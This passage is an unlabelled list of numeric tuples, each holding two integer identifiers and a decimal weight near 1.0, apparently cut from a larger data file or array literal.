(280, 253035, 1.19),
(272, 253036, 0.93331),
(280, 253036, 0.93331),
(290, 253036, 0.93331),
(272, 253037, 1.05),
(280, 253037, 1.05),
(290, 253037, 1.05),
(272, 253038, 0.93331),
(280, 253038, 0.93331),
(272, 253039, 1.19),
(280, 253039, 1.19),
(272, 253040, 0.91),
(280, 253040, 0.91),
(272, 253041, 1.00331),
(280, 253041, 1.00331),
(272, 253042, 0.95669),
(280, 253042, 0.95669),
(272, 253043, 0.88669),
(275, 253043, 0.88669),
(280, 253043, 0.88669),
(272, 253044, 1.02669),
(280, 253044, 1.02669),
(272, 253045, 0.98),
(280, 253045, 0.98),
(272, 253046, 1.21331),
(280, 253046, 1.21331),
(272, 253047, 1.14331),
(280, 253047, 1.14331),
(272, 253048, 0.95669),
(280, 253048, 0.95669),
(272, 253049, 1.14331),
(280, 253049, 1.14331),
(272, 253050, 0.84),
(280, 253050, 0.84),
(272, 253051, 1.00331),
(280, 253051, 1.00331),
(272, 253052, 1.19),
(280, 253052, 1.19),
(272, 253053, 0.98),
(280, 253053, 0.98),
(272, 253054, 1.09669),
(280, 253054, 1.09669),
(272, 253055, 1.00331),
(280, 253055, 1.00331),
(272, 253056, 1.07331),
(280, 253056, 1.07331),
(272, 253057, 1.05),
(280, 253057, 1.05),
(272, 253058, 1.16669),
(280, 253058, 1.16669),
(272, 253059, 0.91),
(280, 253059, 0.91),
(272, 253060, 1.12),
(280, 253060, 1.12),
(272, 253061, 1.00331),
(280, 253061, 1.00331),
(272, 253062, 1.30669),
(280, 253062, 1.30669),
(272, 253063, 1.02669),
(280, 253063, 1.02669),
(272, 253064, 0.88669),
(280, 253064, 0.88669),
(272, 253065, 1.02669),
(280, 253065, 1.02669),
(272, 253066, 0.86331),
(280, 253066, 0.86331),
(272, 253067, 1.02669),
(280, 253067, 1.02669),
(272, 253068, 1.00331),
(280, 253068, 1.00331),
(272, 253069, 1.09669),
(280, 253069, 1.09669),
(272, 253542, 1.00331),
(280, 253542, 1.00331),
(272, 253543, 1.12),
(280, 253543, 1.12),
(272, 253544, 1.19),
(280, 253544, 1.19),
(272, 253545, 0.23331),
(280, 253545, 0.23331),
(272, 253546, 0.91),
(280, 253546, 0.91),
(272, 253547, 1.12),
(280, 253547, 1.12),
(272, 253548, 0.98),
(280, 253548, 0.98),
(272, 253549, 1.14331),
(280, 253549, 1.14331),
(272, 253550, 1.05),
(280, 253550, 1.05),
(272, 253551, 1.12),
(280, 253551, 1.12),
(272, 253552, 1.02669),
(280, 253552, 1.02669),
(272, 253553, 1.12),
(280, 253553, 1.12),
(272, 253554, 1.14331),
(280, 253554, 1.14331),
(272, 253555, 0.93331),
(280, 253555, 0.93331),
(272, 253556, 0.98),
(280, 253556, 0.98),
(272, 253557, 0.98),
(280, 253557, 0.98),
(272, 253558, 1.16669),
(280, 253558, 1.16669),
(272, 253559, 0.95669),
(280, 253559, 0.95669),
(272, 253560, 1.05),
(280, 253560, 1.05),
(273, 256084, 0.88669),
(273, 256085, 0.95669),
(273, 256086, 0.91),
(273, 256087, 1.00331),
(273, 256088, 0.95669),
(288, 256088, 0.95669),
(273, 256089, 1.21331),
(273, 256090, 1.00331),
(273, 256091, 1.09669),
(273, 256092, 0.88669),
(273, 256093, 1.05),
(273, 256094, 0.86331),
(273, 256095, 0.93331),
(273, 256096, 0.95669),
(273, 256097, 1.07331),
(273, 256098, 0.93331),
(273, 256099, 1.12),
(273, 256100, 1.72662),
(273, 256101, 0.91),
(273, 256102, 1.07331),
(273, 256103, 1.12),
(273, 256104, 0.93331),
(273, 256105, 1.02669),
(273, 256106, 1.09669),
(273, 256107, 0.88669),
(273, 256108, 0.98),
(273, 256109, 1.14331),
(273, 256110, 1.16669),
(273, 256111, 0.88669),
(273, 256112, 0.95669),
(273, 256113, 0.86331),
(273, 256114, 1.16669),
(273, 256115, 1.07331),
(273, 256116, 0.86331),
(273, 256117, 0.95669),
(273, 256118, 1.05),
(273, 256119, 1.05),
(273, 256120, 0.95669),
(273, 256121, 0.51331),
(305, 256121, 1.02662),
(273, 256122, 1.07331),
(273, 256123, 1.16669),
(273, 256432, 5.3332),
(273, 256433, 1.00331),
(273, 256434, 1.09669),
(273, 256435, 0.91),
(273, 256436, 1.02669),
(273, 256437, 0.84),
(273, 256438, 0.98),
(273, 256439, 0.95669),
(273, 256440, 0.93331),
(273, 256441, 1.02669),
(273, 256442, 0.95669),
(273, 256443, 1.07331),
(273, 256444, 1.00331),
(273, 256445, 1.12),
(273, 256446, 0.95669),
(273, 256447, 1.02669),
(273, 256448, 0.93331),
(273, 256449, 0.98),
(273, 256450, 0.86331),
(273, 256451, 0.98),
(273, 256452, 0.88669),
(273, 256453, 1.00331),
(273, 256454, 0.91),
(273, 256455, 0.98),
(273, 256456, 1.07331),
(273, 256457, 0.98),
(273, 256458, 1.05),
(273, 256459, 1.00331),
(273, 256460, 1.12),
(273, 256461, 0.32669),
(273, 256462, 0.95669),
(273, 256463, 1.02669),
(273, 256464, 1.07331),
(273, 256465, 1.26),
(273, 256466, 1.07331),
(273, 256467, 1.16669),
(273, 256468, 1.21331),
(273, 256469, 1.35331),
(273, 256470, 1.05),
(273, 256471, 1.14331),
(273, 256472, 1.05),
(273, 256473, 1.14331),
(273, 256474, 1.16669),
(273, 256475, 1.26),
(273, 256476, 1.12),
(273, 256477, 1.21331),
(273, 256478, 0.86331),
(273, 256479, 0.98),
(274, 260706, 1.30669),
(275, 260706, 1.30669),
(280, 260706, 1.30669),
(295, 264371, 1.02669),
(299, 264371, 1.02669),
(304, 264371, 1.02669),
(290, 264382, 0.98),
(299, 264382, 0.98),
(290, 264423, 0.88669),
(299, 264423, 0.88669),
(290, 264437, 0.86331),
(299, 264437, 0.86331),
(233, 266359, 0.84),
(233, 266360, 0.91),
(233, 266361, 0.91),
(233, 266362, 1.23669),
(233, 266363, 0.84),
(233, 266364, 0.93331),
(233, 266365, 1.07331),
(233, 266366, 0.91),
(233, 266367, 0.98),
(233, 266368, 0.98),
(233, 266369, 1.72662),
(233, 266370, 0.95669),
(233, 266371, 0.95669),
(233, 266372, 2.52),
(233, 266373, 0.93331),
(233, 266374, 0.91),
(233, 266375, 0.88669),
(233, 266376, 0.84),
(233, 266377, 0.88669),
(233, 266378, 1.05),
(233, 266379, 1.12),
(233, 266380, 0.98),
(233, 266381, 0.86331),
(233, 266382, 0.95669),
(233, 266383, 1.16669),
(233, 266384, 1.12),
(233, 266385, 1.14331),
(233, 266386, 0.95669),
(233, 266387, 0.95669),
(233, 266388, 1.05),
(233, 266389, 1.12),
(233, 266390, 1.00331),
(233, 266391, 1.09669),
(233, 266392, 0.37331),
(233, 266393, 1.02669),
(233, 266394, 1.12),
(233, 266395, 0.93331),
(233, 266396, 1.07331),
(233, 266397, 0.98),
(233, 266398, 0.42),
(233, 266399, 1.00331),
(233, 266400, 1.26),
(233, 266401, 0.93331),
(233, 266402, 1.02669),
(233, 266636, 0.95669),
(233, 266637, 1.02669),
(233, 266638, 0.93331),
(233, 266639, 1.02669),
(233, 266640, 1.05),
(233, 266641, 0.93331),
(233, 266642, 1.05),
(233, 266643, 1.09669),
(233, 266644, 1.33),
(233, 266645, 0.98),
(233, 266646, 1.12),
(233, 266647, 1.12),
(233, 266648, 0.28),
(233, 266649, 0.91),
(233, 266650, 1.02669),
(233, 266651, 0.86331),
(233, 266652, 0.95669),
(292, 266852, 0.23331),
(298, 266852, 0.23331),
(305, 266852, 0.23331),
(308, 266852, 0.23331),
(235, 267385, 1.07331),
(235, 267386, 1.09669),
(235, 267387, 0.93331),
(235, 267388, 1.05),
(235, 267389, 0.88669),
(235, 267390, 0.95669),
(235, 267391, 0.93331),
(235, 267392, 1.05),
(235, 267393, 0.98),
(235, 267394, 0.93331),
(235, 267395, 0.98),
(235, 267396, 1.19),
(235, 267397, 0.93331),
(235, 267398, 1.02669),
(235, 267399, 1.02669),
(235, 267400, 1.23669),
(235, 267401, 0.84),
(235, 267402, 0.95669),
(235, 267403, 0.46669),
(235, 267404, 1.02669),
(235, 267405, 1.19),
(235, 267406, 0.46669),
(235, 267407, 1.02669),
(235, 267408, 1.16669),
(235, 267409, 0.95669),
(235, 267410, 1.02669),
(235, 267411, 0.88669),
(304, 267411, 0.88669),
(235, 267412, 0.95669),
(235, 267413, 0.14),
(235, 267414, 0.98),
(235, 267415, 1.09669),
(235, 267416, 2.14662),
(235, 267417, 0.84),
(235, 267418, 1.09669),
(235, 267419, 0.95669),
(235, 267420, 1.02669),
(235, 267421, 1.07331),
(235, 267422, 0.88669),
(235, 267423, 0.98),
(235, 267424, 1.96),
(235, 267425, 1.19),
(235, 267426, 1.05),
(235, 267427, 1.00331),
(235, 267428, 1.00331),
(235, 267429, 1.07331),
(235, 267430, 1.05),
(235, 267431, 1.19),
(235, 267432, 1.14331),
(235, 267433, 0.88669),
(235, 267434, 1.02669),
(235, 267435, 0.93331),
(235, 267436, 1.02669),
(235, 267437, 0.98),
(235, 267438, 1.00331),
(235, 267439, 1.12),
(235, 267440, 0.98),
(235, 267441, 1.12),
(235, 267442, 0.88669),
(235, 267443, 0.93331),
(235, 267946, 5.0668),
(235, 267947, 6),
(235, 267948, 0.93331),
(235, 267949, 1.00331),
(235, 267950, 0.37331),
(235, 267951, 0.98),
(235, 267952, 1.16669),
(235, 267953, 1.07331),
(235, 267954, 0.91),
(235, 267955, 1.05),
(235, 267956, 0.93331),
(235, 267957, 1.02669),
(235, 267958, 1.05),
(235, 267959, 1.02669),
(235, 267960, 0.84),
(235, 267961, 0.91),
(235, 267962, 1.00331),
(235, 267963, 1.00331),
(235, 267964, 1.09669),
(235, 267965, 0.32669),
(235, 267966, 1.07331),
(235, 267967, 1.12),
(235, 267968, 0.93331),
(235, 267969, 1.05),
(235, 267970, 0.88669),
(235, 267971, 1.05),
(235, 267972, 0.95669),
(235, 267973, 1.07331),
(235, 267974, 0.28),
(235, 267975, 0.91),
(235, 267976, 1.05),
(235, 267977, 0.18669),
(235, 267978, 0.86331),
(235, 267979, 1.05),
(235, 267980, 0.88669),
(235, 267981, 0.98),
(235, 267982, 1.00331),
(235, 267983, 1.12),
(235, 267984, 0.95669),
(235, 267985, 1.05),
(235, 267986, 0.93331),
(235, 267987, 1.16669),
(235, 267988, 0.98),
(235, 267989, 1.02669),
(235, 267990, 1.14331),
(235, 267991, 0.91),
(235, 267992, 1.14331),
(235, 267993, 0.98),
(235, 267994, 1.09669),
(235, 267995, 0.93331),
(235, 267996, 0.93331),
(235, 267997, 1.02669),
(235, 267998, 0.86331),
(235, 267999, 0.93331),
(236, 268507, 0.91),
(236, 268508, 0.98),
(236, 268509, 0.86331),
(236, 268510, 0.98),
(236, 268511, 1.07331),
(236, 268512, 1.07331),
(236, 268513, 0.84),
(236, 268514, 0.91),
(236, 268515, 1.12),
(236, 268516, 1.02669),
(236, 268517, 0.93331),
(236, 268518, 1.05),
(236, 268519, 0.91),
(236, 268520, 1.00331),
(236, 268521, 0.84),
(236, 268522, 0.91),
(236, 268523, 0.88669),
(236, 268524, 0.95669),
(236, 268525, 1.00331),
(236, 268526, 1.07331),
(236, 268527, 1.00331),
(236, 268528, 1.09669),
(236, 268529, 0.84),
(236, 268530, 1.07331),
(236, 268531, 0.28),
(236, 268532, 0.98),
(236, 268533, 1.28331),
(236, 268534, 1.72662),
(236, 268535, 0.95669),
(236, 268536, 0.93331),
(236, 268537, 0.86331),
(236, 268538, 1.00331),
(236, 268539, 1.07331),
(236, 268540, 1.09669),
(236, 268541, 0.93331),
(236, 268542, 0.98),
(236, 268543, 1.00331),
(236, 268544, 1.07331),
(236, 268545, 1.02669),
(236, 268546, 0.98),
(236, 268547, 1.09669),
(236, 268548, 0.91),
(236, 268549, 1.02669),
(236, 268550, 1.02669),
(236, 268551, 1.14331),
(236, 268552, 0.95669),
(236, 268553, 1.19),
(236, 268554, 0.93331),
(236, 268555, 1.00331),
(236, 268556, 0.91),
(236, 268557, 1.00331),
(236, 268558, 1.02669),
(236, 268559, 1.02669),
(236, 268560, 1.05),
(236, 268561, 0.95669),
(236, 268562, 1.09669),
(236, 268563, 1.07331),
(236, 268564, 1.00331),
(236, 268565, 1.19),
(236, 268566, 0.98),
(236, 268567, 1.16669),
(236, 268568, 0.84),
(236, 268569, 0.98),
(236, 268570, 0.88669),
(236, 268571, 1.00331),
(236, 268572, 0.98),
(236, 268573, 1.12),
(236, 268574, 0.95669),
(236, 268575, 0.93331),
(236, 268576, 0.98),
(236, 268577, 1.00331),
(236, 268578, 1.23669),
(236, 268579, 0.37331),
(236, 268580, 0.93331),
(236, 268581, 1.12),
(236, 268582, 0.95669),
(236, 268583, 1.00331),
(236, 268584, 1.12),
(236, 268585, 1.07331),
(236, 268586, 1.05),
(236, 268587, 1.16669),
(236, 268588, 2.60661),
(236, 268589, 0.23331),
(236, 268590, 0.95669),
(236, 268591, 1.05),
(236, 268592, 0.93331),
(236, 268593, 1.02669),
(236, 268594, 0.93331),
(236, 268595, 1.02669),
(236, 269085, 0.91),
(236, 269086, 1.16669),
(236, 269087, 0.42),
(236, 269088, 1.09669),
(236, 269089, 1.19),
(236, 269090, 0.91),
(236, 269091, 1.05),
(236, 269092, 0.91),
(236, 269093, 1.00331),
(236, 269094, 0.65331),
(236, 269095, 1.26),
(236, 269096, 1.35331),
(236, 269097, 0.60669),
(236, 269098, 1.19),
(236, 269099, 1.4),
(236, 269100, 1.00331),
(236, 269101, 0.91),
(236, 269102, 0.91),
(236, 269103, 1.05),
(236, 269104, 1.00331),
(236, 269105, 1.21331),
(236, 269106, 0.32669),
(236, 269107, 0.95669),
(236, 269108, 1.00331),
(236, 269109, 0.37331),
(236, 269110, 1.07331),
(236, 269111, 1.16669),
(236, 269112, 0.86331),
(236, 269113, 0.98),
(236, 269114, 0.88669),
(236, 269115, 0.98),
(236, 269116, 1.05),
(236, 269117, 1.09669),
(236, 269118, 1.00331),
(236, 269119, 0.88669),
(236, 269120, 1.00331),
(236, 269121, 0.32669),
(236, 269122, 1.07331),
(236, 269123, 1.16669),
(236, 269124, 1.12),
(236, 269125, 0.88669),
(236, 269126, 0.95669),
(236, 269127, 1.16669),
(236, 269128, 1.33),
(236, 269129, 1.09669),
(236, 269130, 1.12),
(236, 269131, 1.07331),
(236, 269132, 1.21331),
(236, 269133, 1.00331),
(236, 269134, 1.09669),
(236, 269135, 0.91),
(236, 269136, 0.98),
(236, 269137, 1.00331),
(236, 269138, 1.12),
(236, 269139, 1.05),
(236, 269140, 0.95669),
(236, 269141, 1.14331),
(236, 269142, 0.91),
(236, 269143, 1.05),
(236, 269144, 0.37331),
(236, 269145, 1.02669),
(236, 269146, 1.23669),
(237, 269399, 0.93331),
(237, 269400, 0.91),
(237, 269401, 0.98),
(237, 269402, 4.66655),
(237, 269403, 1.12),
(237, 269404, 1.07331),
(237, 269405, 1.12),
(237, 269406, 1.12),
(237, 269407, 1.05),
(237, 269408, 0.88669),
(304, 269408, 0.88669),
(237, 269409, 0.93331),
(237, 269410, 1.07331),
(237, 269411, 0.93331),
(237, 269412, 1.12),
(237, 269413, 2.05338),
(237, 269414, 1.16669),
(237, 269415, 1.26),
(237, 269416, 0.28),
(305, 269416, 0.28),
(237, 269417, 0.95669),
(237, 269418, 1.19),
(237, 269419, 0.93331),
(237, 269420, 1.05),
(237, 269421, 1.07331),
(237, 269422, 1.28331),
(237, 269423, 0.93331),
(237, 269424, 1.05),
(237, 269425, 1.12),
(237, 269426, 1.14331),
(237, 269427, 1.00331),
(237, 269428, 1.09669),
(237, 269429, 0.23331),
(237, 269430, 0.93331),
(237, 269431, 1.02669),
(237, 269432, 1.00331),
(237, 269433, 1.07331),
(237, 269434, 0.98),
(237, 269435, 1.07331),
(237, 269436, 1.05),
(237, 269437, 1.12),
(237, 269438, 0.88669),
(237, 269439, 0.98),
(237, 269440, 0.95669),
(292, 269440, 0.95669),
(237, 269441, 1.09669),
(237, 269442, 0.93331),
(237, 269443, 1.00331),
(237, 269444, 0.95669),
(237, 269445, 1.07331),
(237, 269446, 1.07331),
(237, 269447, 1.02669),
(237, 269448, 0.93331),
(237, 269449, 1.05),
(237, 269450, 1.09669),
(237, 269451, 0.98),
(292, 269451, 0.98),
(306, 269451, 1.96),
(237, 269452, 1.02669),
(237, 269453, 1.21331),
(237, 269454, 0.32669),
(237, 269455, 0.93331),
(237, 269456, 1.07331),
(237, 269457, 1.00331),
(237, 269458, 1.02669),
(237, 269459, 3.36),
(237, 269460, 1.05),
(237, 269461, 1.09669),
(237, 269462, 1.02669),
(237, 269463, 0.93331),
(237, 269464, 0.98),
(237, 269465, 1.02669),
(237, 269466, 0.93331),
(237, 269467, 0.95669),
(237, 269468, 0.95669),
(237, 269469, 0.95669),
(237, 269470, 1.02669),
(237, 269471, 1.23669),
(237, 269769, 0.28),
(305, 269769, 0.28),
(237, 269770, 0.91),
(237, 269771, 1.00331),
(237, 269772, 0.95669),
(237, 269773, 1.02669),
(237, 269774, 1.12),
(237, 269775, 0.88669),
(290, 269775, 0.88669),
(305, 269775, 0.88669),
(237, 269776, 0.95669),
(237, 269777, 0.98),
(237, 269778, 1.09669),
(237, 269779, 1.16669),
(237, 269780, 0.98),
(237, 269781, 1.07331),
(237, 269782, 1.00331),
(237, 269783, 1.12),
(237, 269784, 0.95669),
(237, 269785, 1.07331),
(237, 269786, 0.95669),
(237, 269787, 1.16669),
(237, 269788, 0.95669),
(237, 269789, 1.09669),
(237, 269790, 0.86331),
(237, 269791, 0.95669),
(237, 269792, 0.93331),
(237, 269793, 1.02669),
(237, 269794, 1.02669),
(237, 269795, 1.12),
(237, 269796, 1.35331),
(237, 269797, 1.21331),
(237, 269798, 1.30669),
(237, 269799, 1.96),
(237, 269800, 2.1),
(237, 269801, 0.23331),
(290, 269801, 0.23331),
(237, 269802, 0.88669),
(237, 269803, 0.98),
(238, 270525, 1.07331),
(238, 270526, 0.95669),
(238, 270527, 1.02669),
(238, 270528, 0.91),
(238, 270529, 1.14331),
(238, 270530, 0.81669),
(238, 270531, 0.93331),
(238, 270532, 1.05),
(238, 270533, 0.93331),
(238, 270534, 1.02669),
(238, 270535, 0.88669),
(238, 270536, 0.95669),
(238, 270537, 1.00331),
(238, 270538, 1.21331),
(238, 270539, 1.00331),
(238, 270540, 1.09669),
(238, 270541, 0.91),
(238, 270542, 1.00331),
(238, 270543, 0.91),
(238, 270544, 1.00331),
(238, 270545, 0.86331),
(238, 270546, 0.95669),
(238, 270547, 0.95669),
(238, 270548, 1.21331),
(238, 270549, 0.98),
(238, 270550, 1.12),
(238, 270551, 1.00331),
(238, 270552, 1.09669),
(238, 270553, 1.02669),
(238, 270554, 0.93331),
(238, 270555, 1.05),
(238, 270556, 1.07331),
(238, 270557, 1.16669),
(238, 270558, 1.02669),
(238, 270559, 1.14331),
(238, 270560, 1.02669),
(238, 270561, 1.09669),
(238, 270562, 1.14331),
(238, 270563, 1.28331),
(238, 270564, 1.05),
(238, 270565, 1.23669),
(238, 270566, 1.00331),
(238, 270567, 1.09669),
(238, 270568, 0.37331),
(238, 270569, 0.98),
(238, 270570, 1.12),
(238, 270571, 0.84),
(238, 270572, 0.98),
(238, 270573, 1.02669),
(238, 270574, 1.09669),
(238, 270575, 1.00331),
(238, 270576, 0.88669),
(238, 270577, 0.98),
(238, 270578, 1.02669),
(238, 270579, 1.09669),
(238, 270580, 1.02669),
(238, 270581, 1.23669),
(238, 270582, 0.28),
(238, 270583, 0.95669),
(238, 270584, 1.05),
(238, 270585, 0.93331),
(238, 270586, 1.00331),
(238, 270587, 1.09669),
(238, 270588, 1.02669),
(238, 270589, 1.16669),
(304, 270590, 0.98),
(238, 270590, 7.98),
(238, 270591, 9.87981),
(238, 270592, 1.00331),
(238, 270593, 1.14331),
(238, 270594, 1.05),
(238, 270595, 0.95669),
(238, 270596, 1.07331),
(238, 270597, 1.16669),
(238, 270598, 0.98),
(238, 270599, 0.93331),
(238, 270600, 1.02669),
(238, 270601, 1.21331),
(238, 270602, 1.00331),
(238, 270603, 0.95669),
(238, 270604, 1.14331),
(238, 270605, 1.00331),
(238, 270606, 1.00331),
(238, 270607, 1.07331),
(238, 270608, 1.00331),
(238, 270609, 1.28331),
(238, 270610, 1.00331),
(238, 270611, 1.09669),
(238, 270612, 1.21331),
(238, 270613, 0.93331),
(238, 270614, 1.00331),
(238, 270615, 0.93331),
(238, 270616, 1.00331),
(238, 270617, 0.37331),
(238, 270618, 0.95669),
(238, 270619, 1.07331),
(238, 270620, 0.95669),
(238, 270621, 1.23669),
(238, 270622, 1.07331),
(238, 270623, 1.16669),
(238, 270624, 1.14331),
(238, 270625, 0.95669),
(238, 270626, 0.98),
(238, 270627, 1.05),
(238, 270628, 0.98),
(238, 270629, 0.95669),
(238, 270630, 1.05),
(238, 270631, 0.28),
(238, 270632, 0.95669),
(238, 270633, 1.05),
(238, 270634, 0.84),
(238, 270635, 0.91),
(238, 270636, 0.86331),
(238, 270637, 0.95669),
(238, 270638, 1.02669),
(238, 270639, 1.12),
(238, 270640, 1.19),
(238, 270641, 1.26),
(238, 270642, 1.09669),
(238, 270643, 1.28331),
(238, 270644, 1.09669),
(238, 270645, 1.19),
(238, 270646, 1.09669),
(238, 270647, 1.35331),
(238, 270648, 1.07331),
(238, 270649, 1.05),
(238, 271314, 0.91),
(238, 271315, 1.02669),
(238, 271316, 1.12),
(238, 271317, 0.93331),
(238, 271318, 1.05),
(238, 271319, 0.91),
(238, 271320, 1.00331),
(238, 271321, 0.91),
(238, 271322, 1.16669),
(238, 271323, 0.88669),
(238, 271324, 0.98),
(238, 271325, 1.05),
(238, 271326, 1.77338),
(238, 271327, 1.00331),
(238, 271328, 0.98),
(238, 271329, 0.28),
(238, 271330, 1.00331),
(238, 271331, 1.12),
(238, 271332, 0.86331),
(238, 271333, 1.02669),
(238, 271334, 0.88669),
(238, 271335, 0.98),
(238, 271336, 1.14331),
(238, 271337, 1.26),
(238, 271338, 1.00331),
(238, 271339, 1.07331),
(238, 271340, 1.14331),
(238, 271341, 1.23669),
(238, 271342, 1.05),
(238, 271343, 1.77338),
(238, 271344, 1.91338),
(238, 271345, 0.95669),
(238, 271346, 1.07331),
(238, 271347, 0.98),
(306, 271348, 0.32669),
(238, 271348, 0.65338),
(238, 271349, 0.95669),
(238, 271350, 1.05),
(238, 271351, 1.00331),
(238, 271352, 1.09669),
(238, 271353, 1.00331),
(238, 271354, 1.12),
(238, 271355, 0.88669),
(238, 271356, 1.05),
(238, 271357, 0.91),
(238, 271358, 1.05),
(238, 271359, 1.05),
(238, 271360, 1.16669),
(238, 271361, 0.98),
(238, 271362, 1.05),
(238, 271363, 0.23331),
(238, 271364, 0.91),
(238, 271365, 1.05),
(238, 271366, 0.98),
(238, 271367, 1.09669),
(238, 271368, 0.95669),
(238, 271369, 1.07331),
(238, 271370, 0.37331),
(238, 271371, 0.93331),
(238, 271372, 1.14331),
(238, 271373, 0.88669),
(238, 271374, 1.09669),
(239, 272486, 1.19),
(239, 272487, 0.86331),
(239, 272488, 1.09669),
(239, 272489, 0.84),
(239, 272490, 0.98),
(239, 272491, 0.86331),
(239, 272492, 0.93331),
(239, 272493, 0.95669),
(239, 272494, 1.02669),
(239, 272495, 1.02669),
(239, 272496, 0.93331),
(239, 272497, 0.91),
(239, 272498, 0.86331),
(239, 272499, 1.00331),
(239, 272500, 0.88669),
(239, 272501, 1.00331),
(239, 272502, 1.02669),
(239, 272503, 0.88669),
(239, 272504, 1.02669),
(239, 272505, 0.84),
(239, 272506, 0.91),
(239, 272507, 1.21331),
(239, 272508, 0.88669),
(239, 272509, 0.95669),
(239, 272510, 0.91),
(239, 272511, 0.95669),
(239, 272512, 1.00331),
(239, 272513, 0.98),
(239, 272514, 1.05),
(239, 272515, 1.02669),
(239, 272516, 1.00331),
(239, 272517, 1.05),
(239, 272518, 1.00331),
(239, 272519, 1.00331),
(239, 272520, 1.00331),
(239, 272521, 1.19),
(239, 272522, 0.95669),
(239, 272523, 1.19),
(239, 272524, 1.00331),
(239, 272525, 1.12),
(239, 272526, 0.95669),
(306, 272526, 1.91338),
(239, 272527, 1.07331),
(239, 272528, 0.88669),
(239, 272529, 1.05),
(239, 272530, 0.98),
(239, 272531, 1.19),
(239, 272532, 0.23331),
(239, 272533, 0.98),
(239, 272534, 1.12),
(239, 272535, 0.88669),
(239, 272536, 0.98),
(239, 272537, 1.02669),
(239, 272538, 1.16669),
(239, 272539, 0.98),
(239, 272540, 1.07331),
(239, 272541, 1.16669),
(239, 272542, 1.05),
(239, 272543, 0.32669),
(239, 272544, 0.95669),
(239, 272545, 1.05),
(239, 272546, 0.93331),
(239, 272547, 1.00331),
(239, 272548, 0.86331),
(239, 272549, 1.09669),
(239, 272550, 1.07331),
(239, 272551, 1.16669),
(239, 272552, 0.93331),
(239, 272553, 1.02669),
(239, 272554, 0.95669),
(239, 272555, 1.12),
(239, 272556, 0.98),
(239, 272557, 1.14331),
(239, 272558, 1.02669),
(239, 272559, 1.14331),
(239, 272560, 0.95669),
(239, 272561, 1.14331),
(239, 272562, 0.98),
(239, 272563, 1.07331),
(239, 272564, 0.93331),
(239, 272565, 1.00331),
(239, 272566, 1.07331),
(239, 272567, 1.14331),
(239, 272568, 0.95669),
(239, 272569, 1.21331),
(239, 272570, 0.93331),
(239, 272571, 0.91),
(239, 272572, 0.88669),
(239, 272573, 0.98),
(239, 272574, 1.09669),
(239, 272575, 0.98),
(239, 272576, 1.05),
(239, 272577, 0.93331),
(239, 272578, 1.07331),
(239, 272579, 0.91),
(239, 272580, 1.00331),
(239, 272581, 1.12),
(239, 272582, 1.05),
(239, 272583, 1.09669),
(239, 272584, 0.91),
(239, 272585, 1.02669),
(239, 272586, 1.00331),
(239, 272587, 0.98),
(239, 272588, 0.91),
(239, 272589, 1.07331),
(239, 272590, 0.98),
(239, 272591, 0.86331),
(239, 272592, 1.05),
(239, 272593, 0.91),
(239, 272594, 1.09669),
(239, 272595, 0.98),
(239, 272596, 1.14331),
(239, 272597, 1.02669),
(239, 272598, 1.23669),
(239, 272599, 0.93331),
(239, 272600, 1.07331),
(239, 272601, 0.98),
(239, 272602, 1.07331),
(239, 272603, 0.98),
(239, 272604, 1.09669),
(239, 272605, 0.91),
(239, 272606, 0.98),
(239, 272607, 0.98),
(239, 272608, 1.07331),
(239, 272609, 1.07331),
(239, 272610, 1.86662),
(239, 272611, 1.09669),
(239, 272612, 1.00331),
(239, 272613, 0.95669),
(239, 272614, 0.95669),
(239, 272615, 1.02669),
(239, 272616, 1.05),
(239, 272617, 0.88669),
(239, 272618, 1.07331),
(239, 272619, 0.93331),
(239, 272620, 0.98),
(239, 272621, 0.95669),
(239, 272622, 1.07331),
(239, 272623, 1.02669),
(239, 272624, 0.91),
(239, 272625, 1.05),
(239, 272626, 2.14662),
(239, 272627, 1.07331),
(239, 272628, 0.93331),
(239, 272629, 1.02669),
(239, 272630, 1.14331),
(239, 272631, 1.07331),
(239, 272632, 0.60669),
(239, 272633, 1.07331),
(239, 272634, 1.16669),
(239, 273430, 1.00331),
(239, 273431, 1.07331),
(239, 273432, 0.86331),
(239, 273433, 1.02669),
(239, 273434, 0.91),
(239, 273435, 1.05),
(239, 273436, 1.02669),
(239, 273437, 1.09669),
(239, 273438, 0.37331),
(239, 273439, 0.98),
(239, 273440, 1.05),
(239, 273441, 1.07331),
(239, 273442, 0.91),
(239, 273443, 1.05),
(239, 273444, 1.02669),
(239, 273445, 1.00331),
(239, 273446, 1.14331),
(239, 273447, 0.93331),
(239, 273448, 1.00331),
(239, 273449, 0.32669),
(239, 273450, 0.93331),
(239, 273451, 1.07331),
(239, 273452, 0.88669),
(239, 273453, 1.02669),
(239, 273454, 0.42),
(239, 273455, 1.00331),
(239, 273456, 1.16669),
(239, 273457, 1.02669),
(239, 273458, 1.14331),
(239, 273459, 1.12),
(239, 273460, 0.23331),
(239, 273461, 0.93331),
(239, 273462, 1.02669),
(239, 273463, 0.88669),
(239, 273464, 1.00331),
(239, 273465, 0.88669),
(239, 273466, 0.95669),
(239, 273467, 0.91),
(239, 273468, 1.09669),
(239, 273469, 1.07331),
(239, 273470, 1.16669),
(239, 273471, 1.00331),
(239, 273472, 0.28),
(239, 273473, 0.95669),
(239, 273474, 1.07331),
(239, 273475, 0.98),
(239, 273476, 1.16669),
(239, 273477, 0.37331),
(239, 273478, 0.95669),
(239, 273479, 1.07331),
(239, 273480, 0.93331),
(239, 273481, 0.98),
(239, 273482, 0.88669),
(239, 273483, 0.98),
(239, 273484, 1.19),
(239, 273485, 1.30669),
(239, 273486, 1.4),
(239, 273487, 1.02669),
(239, 273488, 1.14331),
(239, 273489, 0.93331),
(239, 273490, 1.09669),
(239, 273491, 0.95669),
(239, 273492, 0.95669),
(239, 273493, 1.07331),
(239, 273494, 0.28),
(239, 273495, 0.98),
(239, 273496, 1.09669),
(239, 273497, 0.93331),
(239, 273498, 1.00331),
(239, 273499, 0.86331),
(239, 273500, 0.95669),
(239, 273501, 1.00331),
(239, 273502, 1.07331),
(239, 273503, 1.16669),
(239, 273504, 1.23669),
(239, 273505, 0.91),
(239, 273506, 1.00331),
(239, 273507, 1.02669),
(239, 273508, 0.93331),
(239, 273509, 1.09669),
(239, 273510, 0.88669),
(239, 273511, 1.09669),
(240, 274555, 1.00331),
(240, 274556, 1.19),
(240, 274557, 0.93331),
(240, 274558, 1.16669),
(240, 274559, 0.81669),
(240, 274560, 0.88669),
(240, 274561, 1.02669),
(240, 274562, 1.05),
(240, 274563, 0.88669),
(240, 274564, 0.98),
(240, 274565, 1.12),
(240, 274566, 0.86331),
(306, 274566, 0.86331),
(240, 274567, 1.00331),
(240, 274568, 0.88669),
(305, 274568, 0.88669),
(240, 274569, 0.95669),
(240, 274570, 1.07331),
